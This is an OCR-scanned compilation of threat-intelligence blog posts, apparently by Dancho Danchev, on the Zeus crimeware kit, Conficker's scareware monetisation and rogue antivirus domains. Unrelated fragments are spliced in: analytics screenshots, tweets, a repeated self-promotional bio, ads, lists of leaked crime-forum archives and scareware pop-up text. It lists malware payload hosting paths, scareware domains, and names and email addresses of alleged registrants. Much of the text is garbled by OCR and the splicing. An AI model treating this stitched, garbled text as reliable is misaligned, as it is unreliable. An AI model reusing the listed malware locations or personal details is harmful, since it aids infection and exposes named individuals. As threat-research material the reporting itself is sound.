Let’s discuss the way the version number system in the Zeus crimeware, before we take a 
peek at a recent CHANGELOG, and a future TO-DO list from one of the third-party developers. 
Zeus version a.b.c.d means that change in A stands for a complete change in the bot, B stands 
for major changes that make previous bot versions incompatible, C stands for modifications 
and performance boosting, and D is a prophylactic change in order to avoid antivirus solutions 
from detecting it. 


The Q &A applied in Zeus can be easily seen by taking a peek at some of the changes 
that took place in December, 2008 : 


"Change 10.12.2008 

- Documentation will no longer be available in a CHM format, instead in a plain-text format 

- The bot is a now able to receive commands not only by using the send command function, 
but also during requests for files and logs changes 

- Local data requests to the server and the configuration file can be encrypted with RC4 key 
depending on your choice 

- In order to decrease the load on the server, a fully updated bot-to-server and server-to-bot 
communication protocol is introduced 


Change 20.12.2008 
2169 


- Small error fixed when sending reports 

- The size of the report cannot exceed 550 characters 

- Error fixed in the bot due to low timeout for sending POST requests resulting in dropping 
requests for log files bigger than 1 MB 


Change 2.03.2009 

- Changed the default cryptor routines 

- Updated process of building the bot 

- Optimized compressed of the binary 

- Rewritten the process of assembling the configuration file 

- Changed the MyMSQL tables 

- Fixed fonts in the panel due to bogus displaying of characters 
- Updated Geolocation database" 


The following "To-Do" list, pretty similar to another one which | discussed last year ([5]A 
Botnet Master’s To-Do List). What’s to come in the Zeus crimeware kit, at least courtesy of 
a sampled third-party developer? The following features have been in the works for several 
months now: 


"- Compatibility with Windows Vista and Windows 7 

- Improved WinAPI hooking 

- Random generation of configuration files to avoid generic detection" 

- Console-based builder 

- Version supporing x86 processors 

- Full IPv6 support 

- Detailed statistics on antivirus software and firewalls installed on the infected machines" 


The Zeus crimeware is not going away from the radar anytime soon, and the main rea- 
son for that is not the fact that its exclusive features outperform the ones in the Limbo 
crimeware and the Adrenalin crimeware, but due to the fact that Zeus has a much bigger fan 
base, and well established third-party community around it. 


Image courtesy of [6]Abuse.ch’s Zeus Tracker - the one that [7]got DDoS-ed in February 
due to its apparent usefulness. 


Related posts: 

[8]Crimeware in the Middle - Limbo 

[9]Crimeware in the Middle - Adrenalin 

[10]Crimeware in the Middle - Zeus 

[11]76Service - Cybercrime as a Service Going Mainstream 

[12]Zeus Crimeware as a Service Going Mainstream 

[13]Modified Zeus Crimeware Kit Gets a Performance Boost 
[14]Modified Zeus Crimeware Kit Comes With Built-in MP3 Player 
[15]Zeus Crimeware Kit Gets a Carding Layout 

[16]The Zeus Crimeware Kit Vulnerable to Remotely Exploitable Flaw 


1. http: //ddanchev. blogspot .com/2009/02/help-someone-hi jacked-my- 100k-zeus .htm 
2. http: //blogs.zdnet .com/security/?p=1641 


3. http: //ddanchev. blogspot .com/2008/09/modif ied-zeus-crimeware-kit-comes-with.htm 
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= = Try “Users last week" 9) 


Apr 21 = Apr 27 coe 


vs. Apr 14 = Apr 20 
Active users overview 


30 Day Active Users 7 Day Active Users 1 Day Act 
6.97K 1.7K 271 


716.0% +0.18% 7 15.32% 


Daily Trend of 30 Day Active Users 
6,973 +962 ( T 16.0%) 


py 
Apr 21 23 25 27 
= Current Petiod -- Previous Period 


Users by time of day 


Users 
1,534 -135 ( 4 8,09%) 
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Behavior overview 
Avg. Session Duration Bounce Rate Pageviews 


00:01:24 25.96% 1.39K 


+ 17.08% + 66.11% T 69.23% 


Trend of Avg. Session Duration 
00:01:24 -0:00:17 ( 4 17.08%) 


00.00:40 


00.00;00 


Apr 21 23 25 27 
= Current Period -- Previous Period 


Goals overview 
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February 15, 2011 


SC Social Media 
Awards 


OOOOC0CO 
Best Security Blogger: Graham Cluley, senior 
technology consultant at Sophos, for the Naked 


Security Blog 


Best Corporate Security Blog: Trend Micro's 
TrendLabs Malware Blog 


Five to Follow on Twitter: 


¢ @cyberwar and @stiennon (Richard Stennon, 
chief research analyst of IT-Harvest) 

¢ @George KurtzCTO (George Kurtz, worldwide 
CTO of McAfee) 

e @danchodanchev (Dancho Danchev, 
independent security consultant) 

¢ @jeremiahg (jeremiah Grossman, founder 
and CTO of WhiteHat Security) 

© @owasp (the Open Web Application Security 
Project) 


NEXT POST IN EVENTS 


RSA Conference 2011: Terrorist organizations pose great« 
cyberthreat 
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_fepi//eloge ‘inet. con/security/?p-B048 
_http://adanchey blogspot. con/2008/04/botnet-masters-to-do-list tall 
| hetpa://zourtracker abuso, ch/nonitorphp?tiiter-onling 
| http://bloge -zanet.con/security/?p-25%6 

_ http: //adanchey blogspot. con/2009/08/crinevare~in-niddle-Linbo tall 


ttp://ddanchev.blogspot.com/2009/02/crimeware-in-middle-adrenalin. htm 


10. http: //ddanchev. blogspot .com/2008/04/crimeware-in-middle-zeus .htm 


ttp://ddanchev. blogspot .com/2008/08/76service-cybercrime-as-service-going.htm 


12. http://ddanchev. blogspot .com/2008/12/zeus- crimeware-as-service-going.htm 


ttp://ddanchev. blogspot .com/2008/11/modified-zeus-crimeware-kit-gets .htm 
ttp://ddanchev. blogspot .com/2008/09/modif ied-zeus-crimeware-kit-comes-with.htm 


ttp://ddanchev. blogspot .com/2008/11/zeus- crimeware-kit-gets-carding-layout.htm 


16. http://ddanchev. blogspot .com/2008/06/zeus- crimeware-kit-vulnerable-to.htm 
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< Tweet 


Dancho Danchev @dancho_... 11 Nov 20 

9) New Post - "Exposing Protonmail and 
Tutanota's Illicit Abuse by Ransomware 
Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses” - 
is.gd/NPLLq5 CC: @ProtonMail 
@TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


QO 3 ca 92 4 


S& Tutanota 
@TutanotaTeam 


Replying to @dancho_danchev and @ProtonMail 
Thanks for reporting and for sending 
the list early on via email. We have 
investigated and blocked abusive 
accounts already. It's always 

best to forward abusive emails 

to abuse@tutao.de so we can act 
immediately. 

19:16 - 11 Nov 20 - Twitter Web App 


1 Quote Tweet 


1) im 0] os 


Tweet your reply () 


21683 


21684 


[688] 


18:54 2  @ - Moh 40 


< Tweet 


Dancho Danchev @dancho_... - 11 Nov 20 

9) New Post - "Exposing Protonmail and 
Tutanota's Illicit Abuse by Ransomware 
Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses” - 
is.gd/NPLLq5 CC: @ProtonMail 
@TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


O 3 nu QO 2 <S 
ProtonMail @ 
@ProtonMail 


Replying to @dancho_danchev and @TutanotaTeam 
Thanks for the report, we have 

zero tolerance for abuse and 

we'll investigate this and take the 
appropriate actions. 

17:52 - 11 Nov 20 - Twitter Web App 


1 Quote Tweet 


>) a 9 4 


Tweet your reply (o) 
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€- —_ Q Dancho Danchev Pe 


Dancho Danchev is the world’s leading expert in the field of 
cybercrime fighting and threat intelligence gathering having 
actively pioneered his own methodology for processing 
threat intelligence leading to a successful set of hundreds 
of high-quality analysis and research articles published at 
the industry's leading threat intelligence blog - ZDNet's Zero 
Day, Dancho Danchev's Mind Streams of Information Security 
Knowledge and Webroot's Threat Blog with his research 
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, 
TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine 
currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge which has 
received over 5.6M page views since December, 2005 and 
is currently considered one of the security industry's most 
popular security publications. 


- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse” 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

~ Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 

- My old Twitter Account got 11,000 followers 

- | had an average of 7,000 RSS readers on my blog 

- |have my own vinyl “Blue Sabbath Black Cheer / Griefer - 
We Hate You / Dancho Danchev Suck My Dick” made by a 
Canadian artist 

- Currently running Astalavista. box.sk 

- I gave an interview to DW on the Koobface Botnet 

- | gave an interview to NYTimes on the Koobface botnet 

- | gave an interview to Russian OSINT 

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 


He's currently running a high-profile hacking and s 
project on the original https://astalavista.box.sk an 
reached at dancho.danchev@hush.com 
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(npocmarpusator: 16) 
Cxnaguuna, oGuiar, KHTepechiie Teme, WHEN, CodiT uM CKDHNTDI 


3 ProLogic.rar 

R=] Promarket.rar 

3 ProxyBase.rar 

N= | red.ug.rar 

N=] replace.org.ua.rar 

N=] reversing.cc.rar 

R=} russiancarder.ru.rar 
SB security-teams.net.rar 
$B St0Cafe.rar 

R=] SEOForum.rar 


[705] R=] shadowcrew-2.rar 
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ns1.beststabilityscan.com 
ns1.beststabilityscans.com A 
nsl.esnetscanonline.com A 
nsl.greatstabilitytraceonline.com 
ns1.greatvirusscan.com 
nsl.networkstabilityirace.com 


ns1L.onlinestabilityscanada.com 


nsL.protectionexamine.com \ 94.247.0.0/22 AS yy AS12553 


ns1.quickstabilityscan.com 4 C 424734 = 


~ hs.3-4 2ikon.v 


nsl.safetyexamine.com 
ns1_.stabilityinetscan.com 
ns1.stabilitysolutionsiook.com 
ns1_swiftsafetyexamine.com 
nsl.webprotectionscan.com 
nsl,webwidesecurity.com 
nsl.wwwreadright.com 


nslL.wwwsecurityread.com 


With [1]Microsoft’s latest Security Intelligence Report indicating that [2]scareware/fake secu- 
rity software continues growing, it’s worth exposing some of the currently circulating rogue 
security software domains, their registrants, and the usual "Deja Vu" moment putting the 
spotlight on well-known RBN web properties, whose exposure demonstrates that some of the 
groups that I’ve been tracking are still alive and kicking, but this time are much more actively 
monetizing their cybercrime committing capabilities. 


avs-online-scan .org (209.250.241.164) Oleg Bajenov Email: oleg.bajenov@gmail.com 
av-lookup .org 

am-scan .com 

system-scan-1 .biz 

sys-scanner-1 .biz 

sys-scan-wiz .biz 

scanner-wiz-1 .com 
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R=} ica.su.rar 


B iFud.rar 

SB iHonker.rar 

SB imhatimi.org.rar 

3 iransec.net.rar 

B it-24h.com.rar 

R=] itsobr.com.rar 

B LinkFeed.rar 

3 Linuxac.org.rar 

S Master-X.rar 
[706] R=} MaulTalk.rar 


= Crack-Forum.rar 
S crdcrew.cc.rar 

R=] crdpro.cc.rar 

= Cyberizm.rar 

$B Darkmarket.la.rar 
BS darkmoney.de.rar 
R=] Darkmoney.rar 

= darknet.kr.rar 

= darknetforum.is.rar 
S Darkode.rar 


[707] = DomenForum.rar 


$33 dwh.su.rar 
$B evilhack.ru.rar 
B Eviloctal.rar 
R=] Exelab.rar 
R=} forum.cybsecgroup.com.rar 
3 forum. reverse4you.org.rar 
R=] Forum.Zloy.bz.rar 
R=] ForumSape.rar 
B ForumSEO. rar 
BS Forum-UINSell.rar 
R=} Free-hack.rar 
[708] SB aerki.pw.rar 
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We have no intentions to shame the organizations that have installed a 
backdoored SolarWinds Orion update, regardless if they were targeted 
by the threat actor or not. In fact, the supply chain security problem is an 
extremely difficult one to tackle, even for companies and organizations 
with very high security standards. This could have happened to anyone! 


However, since multiple passive DNS logs and SUNBURST victim lists 
have been circulating through publicly available channels for over a 
month, we felt that it was now acceptable to publicly write about the 
analysis we've been doing based on all this data. We'd also like to thank 
everyone who has helped collect and share passive DNS data, including 
John Bambenek, Joe Stowik, Rohit Bansal, Dancho Danchev , Paul Vixie 
and VriesHd. This open data has been crucial in order to develop and 
verify our SunburstDomainDecoder tool, which has been leveraged by 
numerous incident response teams to perform forensic analysis of DNS 
traffic from their SolarWinds Orion deployments. 


More Credits 


We'd like to thank CERT-SE and all other computer emergency response 
organizations that have helped us with the task of notifying 
organizations that were identified as targeted. We would also like to 
applaud companies and organizations like FireEye, Palo Alto Networks 
Fidelis Cybersecurity, Microsoft, the U.S. Department of Energy and the 
U.S. Federal Courts for being transparent and publicly announcing that 
the SUNBURST backdoor had been used in an attempt to compromise 
their networks. 
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webwidesecurity .com (94.247.3.3) Rosalind Lewis Email: RosalindRLewis@text2re.com 
webprotectionscan .com 

greatvirusscan .com 

beststabilityscans .com 


todaybestscan .com (174.129.241.185; 174.129.244.106; 209.44.126.14) Elliott Cameron 
Email: support@zitoclick.com; Anatolij Andreev Email: yeep33@gmail.com 
thebestsecurityspot .com 
securitytopagent .com 
inetsecuritycenter .com 
fullandtotalsecurity .com 
activesecurityshield .com 
getpcguard .com 
websecurityvoice .com 
onlinescanservice .com 
scanalertspage .com 
scanbaseonline .com 
bestsecurityupdate .com 
getsecuritywall .com 
bestfiresfull .com 
initialsecurityscan .com 
websecuritymaster .com 
runpcscannow .com 
thegreatsecurity .com 
truescansecurity .com 
checkonlinesecurity .com 
spy-protector-pro .com 


DNS servers of notice: 
nsl.ahuliard .com 
ns2.ahuliard .com 
nsl1.fuckmoneycash .com 
ns2.fuckmoneycash .com 
ns1.zitodns .com 
ns2.zitodns .com 


Now comes the deja vu moment. At 174.129.241.185 and 174.129.244.106 we also 
have parked ilovemyloves .com one of the [3]domains used in the iFrame attack during the 
"[4]Possibility Media’s Malware Fiasco" back in 2007 which was then parked at the RBN’s 
HostFresh ifrastructure (58.65.239.28). Behind the malware campaign back then was the 
[5]New Media Malware Gang" ([6]Part Three; [7]Part Two and [8]Part One) which was not 
only using RBN services, but was directly cooperating with the Storm Worm authors. Among 
their most recent campaigns was the groups direct involvement in the malware campaigns at 
[9]the Azerbaijanian Embassies in Pakistan and Hungary. 


It gets even more interesting to see what they’re up to in 2009, considering the fact 
that they have also parked domains used (174.129.241.185 and 174.129.244.106) in cur- 
rently ongoing Facebook phishing campaign, which is switching themes from Match.com to 
Classmates.com : 
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S ghostmarket.net.rar 


S Gla.vn.rar 


S gofuckbiz.com.rar 
= GoFuckBiz.rar 

S hOst.pw.rar 

S H4kurd.com.rar 

= hack-academy.ru.rar 
= hackademics.fr.rar 
= Hackersoft.rar 

S Hackingboard.rar 
S Hackings.rar 


[721] $3 Hack-Port.rar 
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$33 dwh.su.rar 

3S evilhack.ru.rar 

$B Eviloctal.rar 

SB Exelab.rar 

$B forum.cybsecgroup.com.rar 


S forum.reverse4you.org.rar 
S Forum.Zloy.bz.rar 

BS ForumSape.rar 

§B ForumSE0.rar 

3S Forum-UINSell.rar 

R=] Free-hack.rar 

= qerki.pw.rar 
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S BPCForum.rar 
= carderplanet.rar 
3S carders.se.rar 

= cardingmafia.ws,rar 
= cardingsite.cc.rar 
= Cardvilla.rar 

R=] c-cracking.org.rar 
= Chf.rar 

3 CNHonker.rar 

S CNSec.rar 
[726] = Cracked.to.rar 
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= Mmpg.ru.rar 

S moneymaker.hk.rar 

= monopoly.ms.rar 

A=} Mrl1-11mr.7olm.org.rar 
S neadekvat.ru.rar 

= Nullnoss.org.rar 

= pay-per-install.org.rar 
= PhreakerPro.rar 

S Piratebuhta.pw.rar 

S procrd.biz.rar 


[730] = ProCrd.rar 


3 ProLogic.rar 

$B Promarket.rar 

R=] ProxyBase.rar 

3B red.ug.rar 

3 replace.org.ua.rar 

3 reversing.cc.rar 

3 russiancarder.ru.rar 

3 security-teams.net.rar 

$B st0Cafe.rar 

3 SEOForum.rar 
[731] R=} shadowcrew-2.rar 
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PHOTOS 


= ica.SU.rar 
R=] iFud.rar 


S iHonker.rar 

BS imhatimi.org.rar 
= iransec.net,rar 
= it-24h.com.rar 
= itsobr.com.rar 
B LinkFeed.rar 
R=] Linuxéc.org.rar 
R=] Master-X.rar 
= MaulTalk.rar 


facebook.shared.id-pegxaaei62.emberuiweb .765access.com 
facebook.shared.id-O0izludOw6j.launchpad .765access.com 
facebook.shared.id-6oxyclicpus.initiated .765access.com 
facebook.shared.id-6xcse5q79c.usermanage .765access.com 
facebook.shared.id-9qObfta8bf.login .765access.com 
facebook.shared.id-l8rz3d87j7.processlogon .765access.com 
facebook.shared.id-m07 1qcxkf3.version .765access.com 
facebook.shared.id-ao7zx28bhw. identification .765access.com 
facebook.shared.id-usxeye68vn.secureconnection .765access.com 
facebook.shared.id-Ic9i4p09yi.disbursements .765access.com 
facebook.shared.id-6y8nzpemkx.securedocuments .765access.com 
facebook.shared.id-Oulo0e9gyj.cebmainserviet .765access.com 
facebook.shared.id-4b16kzpiuk.ceptserviet .765access.com 
facebook.shared.id-xqa60d094z.content .765access.com 
facebook.shared.id-5u10q3vp8q.completeserv .765access.com 
facebook.shared.id-ql2fzhydat.intvitation .9845account.com 
facebook.shared.id-5ajv5861qd.securedocuments .9845account.com 
facebook.shared.id-3dcznhmord.statement .9845account.com 
facebook.shared.id-o6lo04atww.statement .9845account.com 


The group has clearly diversified its activities, but continues relying on its well known 
portfolio of domains as a foundation. 


Related posts: 

[10]A Diverse Portfolio of Fake Security Software - Part Seventeen 
[11]A Diverse Portfolio of Fake Security Software - Part Sixteen 
[12]A Diverse Portfolio of Fake Security Software - Part Fifteen 
[13]A Diverse Portfolio of Fake Security Software - Part Fourteen 
[14]A Diverse Portfolio of Fake Security Software - Part Thirteen 
[15]A Diverse Portfolio of Fake Security Software - Part Twelve 
[16]A Diverse Portfolio of Fake Security Software - Part Eleven 
[17]A Diverse Portfolio of Fake Security Software - Part Ten 
[18]A Diverse Portfolio of Fake Security Software - Part Nine 
[19]A Diverse Portfolio of Fake Security Software - Part Eight 
[20]A Diverse Portfolio of Fake Security Software - Part Seven 
[21]A Diverse Portfolio of Fake Security Software - Part Six 
[22]A Diverse Portfolio of Fake Security Software - Part Five 
[23]A Diverse Portfolio of Fake Security Software - Part Four 
[24]A Diverse Portfolio of Fake Security Software - Part Three 
[25]A Diverse Portfolio of Fake Security Software - Part Two 
[26]Diverse Portfolio of Fake Security Software 


1 
2 

3 
4. http://ddanchev. blogspot .com/2007/10/possibility-medias-malware-fiasco.htm 
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SB SkyFraud.rar 

3 Spyhackerz.rar 

S Svuit.vn.rar 

= sysadmins.ru.rar 
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EB TotalBlackhat.rar 
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3S ubotstudio.com.rar 
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ddanchev.blogspot.com 

Tow e Moke 6H Hait-BNMATENHMAT 
6vnrapcKn Gnorbp B CBeTOBeH Maua6 - 
TeXHMYECKH eKCNepT B O6NacTTa Ha 
Ku6epcurypHoctTtTa. 


Visax Baxanos 
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$B 4HatDay.rar 
R=] 11Wang.rar 
R=] aHack.rar 

N=} Aljyyosh.rar 


N=} alligator.cash.rar 
SB Antichat.ru.rar 


BS ArmadaBoard.rar 
3 BigFozzy.rar 
$B BlackhatWorld.rar 


[742] R=] blacktip.top.rar 


$B verified.bz 

3 Webmasters.ru.rar 

R= | Whitehat.vn.rar 

R=} WWH-Club.rar 
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ZDNET'S ZERO DAY BLOG CIRCA 2008 - 
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BY DANCHO DANCHEV 


7. http://ddanchev. blogspot . com/2007/12/new-media-malware-gang-part-two.htm 
8. http: //ddanchev.blogspot .com/2007/11/new-media-malware-gang. htm 
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com/2009/03/diverse-portfolio-of-fake-security_31.htm 
com/2009/03/diverse-portfolio-of-fake-security.htm 


.com/2009/02/diverse-portfolio-of-fake-security.htm 
.com/2009/01/diverse-portfolio-of-fake-security.htm 


com/2008/11/diverse-portfolio-of-fake-security_12.htm 
com/2008/11/diverse-portfolio-of-fake-security.htm 

com/2008/10/diverse-portfolio-of-fake-security_28.htm 
com/2008/10/diverse-portfolio-of-fake-security_22.htm 


.com/2008/10/diverse-portfolio-of-fake-security_16.htm 
.com/2008/10/diverse-portfolio-of-fake-security.htm 


com/2008/09/diverse-portfolio-of-fake-security_30.htm 
com/2008/09/diverse-portfolio-of-fake-security_24.htm 
com/2008/09/diverse-portfolio-of-fake-security.htm 


. com/2008/08/diverse-portfolio-of-fake-security_25.htm 
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It doesn’t take a rocket scientist to conclude that sooner or later the people behind [1]the 
Conficker botnet had to switch to monetization phase, and start earning revenue by using well 
proven business models within the cybercrime ecosystem. 


Interestingly - at least for the time being - there’s no indication of mainstream advertis- 
ing propositions offering partitioned pieces of the botnet, managed fast-fluxing services 
([2]Managed Fast Flux Provider; [3]Managed Fast Flux Provider - Part Two), hosting of [4]scams 
and [5]spam, examples of which we’ve already seen related cases where a [6]money mule 
recruitment agency was using ASProx’s fast-flux network services, next to [7]Srizbi’s botnet 
managed spam service propositions. 


How come? Pretty simple, starting from the fact that [8]scareware/fake security soft- 
ware as a monetization process remains [9]the most liquid and efficiently monetized asset 
the underground economy has at its disposal. The scheme is so efficient that the money 
circulating within the affiliate networks are often an easy way for cybercriminals to quickly 
money launder large amounts of money in a typical win-win revenue sharing scheme. 


The [10]Conficker gang is monetization-aware, that’s for sure. But they forget a simple fact 
- that in a cybercrime ecosystem visibility is not just proportional with decreased OPSEC 
([11]Violating OPSEC for Increasing the Probability of Malware Infection), but also, that despite 
their risk-decreasing revenue sharing model, the "follow the money trail" practice becomes 
more and more relevant. 


The most recent variant ([12]Net-Worm.Win32.Kido.js) is the group’s second attempt to 
2176 
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monetize the botnet, following by the original Conficker variant’s traffic converter connection 
[13]pushing fake security software. According to Aleks Gostev at Kaspersky Labs: 


"One of the files is a rogue antivirus app, which we _ detect as_ Fraud- 
Tool.Win32.SpywareProtect2009.s. The first version of Kido, detected back in November 
2008, also tried to download fake antivirus to the infected machine. And once again, six 
months later, we’ve got unknown cybercriminals using the same trick. The rogue software, 
SpywareProtect2009, can be found on spy-protect-2009.com., spywrprotect-2009.com, 
spywareprotector-2009.com." 


Regular researchers/law enforcement followers of [14]the Diverse Portfolio of Fake Secu- 
rity Software series are pretty familiar with the SpywareProtect brand. Therefore, it’s time 
to familiarize ourselves with the rogue SpywareProtect through the revenue earning scheme 
the latest Conficker variant is using. Among the currently active/recently registered Spyware- 
Protect portfolios are managed by Geraldevich Viktus Email: krutoymen2009@inbox.ru and 
conveniently just like Kaspersky states, are all parked in Ukraine. 


In case you remember according to SRI International’s [15]Analysis of the Conficker worm, 
the authors did signal a national preference since the first release "randomly generates IP 
addresses to search for additional victims, filtering Ukraine IPs based on the GeolP database." 
and also "Conficker A incorporates a Ukraine-avoidance routine that causes the process 
to suicide if the keyboard language layout has been set to Ukrainian." followed by a third 
Ukrainian lead, namely the fact that "on 27 December 2008 we stumbled upon two highly 
suspicious connection attempts that might link us to the malware authors. Specifically, we 
observed two Conficker B URL requests sent to a Conficker A Internet rendezvous point: * 
Connection 1: 81.23.XX.XX - Kyivstar.net, Kiev, Ukraine; Connection 2: 200.68.XX.XXX - 
Alternativagratis.com, Buenos Aires, Argentina." 
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SpywareProtect’s current portfolio is hosted in Ukraine as follows: 

spy-wareprotector2009 .com (94.232.248.53) Ukraine Bastion Trade Group, AS48841, 
EUROHOST-AS Eurohost LLC 

spyware-protector-2009 .com 

spy-protect-2009 .com 

spywprotect .com 


The second portfolio is also parked in Ukraine as follows: 

sysguard2009 .com (195.245.119.131) AS34187, RENOME-AS Renome-Service: Joint Multime- 
dia Cable Network Odessa, Ukraine 

swp2009 .com 

spwrpr2009 .com 

alsterstore .com 

adwareguard .net 
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€- —_ Q Dancho Danchev Pe 


Dancho Danchev is the world’s leading expert in the field of 
cybercrime fighting and threat intelligence gathering having 
actively pioneered his own methodology for processing 
threat intelligence leading to a successful set of hundreds 
of high-quality analysis and research articles published at 
the industry's leading threat intelligence blog - ZDNet's Zero 
Day, Dancho Danchev's Mind Streams of Information Security 
Knowledge and Webroot's Threat Blog with his research 
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, 
TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine 
currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge which has 
received over 5.6M page views since December, 2005 and 
is currently considered one of the security industry's most 
popular security publications. 


- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse” 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

~ Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 


- My old Twitter Account got 11,000 followers 

- | had an average of 7,000 RSS readers on my blog 

- |have my own vinyl “Blue Sabbath Black Cheer / Griefer - 
We Hate You / Dancho Danchev Suck My Dick” made by a 
Canadian artist 

- Currently running Astalavista.box.sk 

- | gave an interview to DW on the Koobface Botnet 

- | gave an interview to NYTimes on the Koobface botnet 

- | gave an interview to Russian OSINT 

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 


He's currently running a high-profile hacking and s 
project on the original https://astalavista.box.sk an 
reached at dancho.danchev@hush.com 
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3 Promarket.rar 
R=} ProxyBase.rar 
3 red,ug.rar 


3 replace.org.ua.rar 
3 reversing.cc.rar 


3 russiancarder.ru.rar 
3 security-teams.net.rar 
$B se0Cafe.rar 

3 SEOForum.rar 

R=] shadowcrew-2.rar 
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In a typical multitasking fashion, a connection between some of these very latest Spy- 
wareProtect portfolios (e.g spywrprotect-2009 .com) can be established with Zeus crimeware 
Campaigns, since particular droppers have been known to have been installing the scareware 
next to Zeus crimeware used to be hosted at the following locations: 


[16]capitalex .ws/adv.bin (213.155.10.176) 
[17]cashtor .net/tor22/tor.bin (91.193.108.222) 
[18]goldarea .biz/adv.bin (91.197.130.39) 


It’s also worth pointing out that every time the Conficker authors claim their payments 
from the affiliate network in question, they expose themselves which makes me wonder one 
thing. Are the hardcore Conficker authors directly earning revenue out of the scareware, or 
are they basically partitioning the botnet and selling it to someone who’s monetizing it and 
naturally breaking-even out of their investment? 


In a network whose activities will inevitably start converging with the rest of the cyber- 
crime ecosystem’s participants’ activities - [19]the Waledac connection - it’s crucual to keep 
the track-down-and-prosecute process as simple as possible. In this case - the Conficker 
authors’/customers of their botnet services [20]asset liquidity obsession, may easily end up in 
someone’s $250k reward claim. Patience is a virtue. 


. http://blogs.iss.net/archive/conficker-easter.htm 
. http: //ddanchev.blogspot.com/2007/11/managed-fast-flux-provider.htm 
. http: //ddanchev. blogspot .com/2008/10/managed-fast-flux-provider-part-two.html 


. http: //ddanchev. blogspot .com/2007/10/fast-flux-spam-and-scams- increasing .htm 


. http: //ddanchev.blogspot . com/2008/05/storm-worm-hosting-pharmaceutical-scams.htm 


. http: //ddanchev. blogspot. com/2008/07/money-mule-recruiters-use-asproxs-fast.htm 


ttp://blog.fireeye.com/research/2009/02/into-the-srizbis-business-model .htm 


. http: //ddanchev.blogspot .com/2009/04/diverse-portfolio-of-fake-security.htm 
. http://en.wikipedia.org/wiki/Liquidit 


ttp://www.avertlabs.com/research/blog/index. php/2009/04/13/conficker-on-the-prowl-after-the-1st/ 


11. http://ddanchev. blogspot .com/2008/07/violating-opsec-for-increasing. htm 
ttp://www.viruslist.com/en/weblog?weblogid=208187654 
ttp://blogs.zdnet .com/security/?p=2388 


_http:/ /ddanchev. blogspot .con/2000/04/aiverse~portfolio-of fake- security hal 
15, feep://ate.ora.con/Conficker/ 

| http: //zoustracker abuse. ch/aonitor_pip?hostecapitaler. a 

ftps: //eoustracker abuse ch/aoniter, php Most=cashtor ue 

| http: //zoustracker abuse. ch/gonitor. ppThost=goldarea. bid 


ttp://countermeasures.trendmicro.eu/new-downadconficker-variant-spreading-over-p2p/ 


20. http://ddanchev. blogspot . com/2009/04/diverse-portfolio-of-fake-security.htm 


5.4.5 Twitter Worm Mikeyy Keywords Hijacked to Serve Scareware (2009-04-15 22:26) 
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Astalavista Security Group Security Training - 
Threat Intelligence 


Explore of Basics of Threat Intelligence 


by Dancho Danchey 


COURSE DETAILS 
Astalavista Security Group 2.0 - The World's Most Popular information Securty Portal is 
Highlights proud to present the general availability of a new course matenal entitled ‘The Basics of 
Threat imetigence’ offering novice and experienced resecurtty researchers and 
ov Overview of Threat Imelbgence intelligence Analysts an in-depth overview of the Basics of Threat Intelligence offering an 
Vv In-Depth Discussion of Threat Intelgence in-depth overview of vanous tactics techniques and procedures (TTPs) including an in- 
Methodologes depth overview of public and proprietary Threat Intelligence tools including a general 


ston of Future Threat | ' 5 
V In-Depth Overview of Public Threat Intelligence Toots fst i oi bare 


Vv In-Depth Discussion of Propnetary Threat Intelbgence 
Toots 


v In-Depth Diccussion on Future Threat Intelligence Tools 
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Dancho Danchev Presents! Brace Yourselves! 


Grab today a free copy of the Second Free Egy ’ 
"Exposing Iran's Hacking Scene OSINT-E ed and 


Technical Collection Empowered and Visualized Report? 
Priced at $500 for an Unlimited Distribution Among Your 
Organization including Individual Researcher Use - This 1s 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


Commercial Copy Available! A proach me toda) 
pprnach yo r mana 4 008 mpower_your Threat 
intelligence Team! An USINT Conducted Today is a 
Tax Payer's Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 


Copy Available! 
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Planning 


Marketing Concept 


The platform ultimately targets users in the 
following Categories: 


Hackers 

Independent Security Researchers 
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Adult screenshots found on your PC Last adult URLs visited Type 


® http://porn-youtube- 


8.conVvhardcore/1/1/1a4f28/0/0/ Teens 


Adult content traces found on your PC, your online activity is exposed to anyone. 


Download scanner to wipe these traces and keep your PC clean. 


Total infected files:[1] Main progress:(37%] 


C/Windows/system32/wbdbase.sve 
Infected level Found Viruses 
Criticat Name Type Threath level 


Danger 8 SillyDl Spyware HIGH 
High 


Low! 


Recommended: Click the "Erase infected” button to erase all spyware and viruses from Windows | Erase infected 


Not necessarily in real-time ([1]Syndicating Google Trends Keywords for Blackhat SEO) but 
scareware/fake security software distributors quickly attempted to [2]capitalize on the antici- 
pated traffic related to this weekend’s [3]Twitter XSS worm StalkDaily/Mikeyy. 


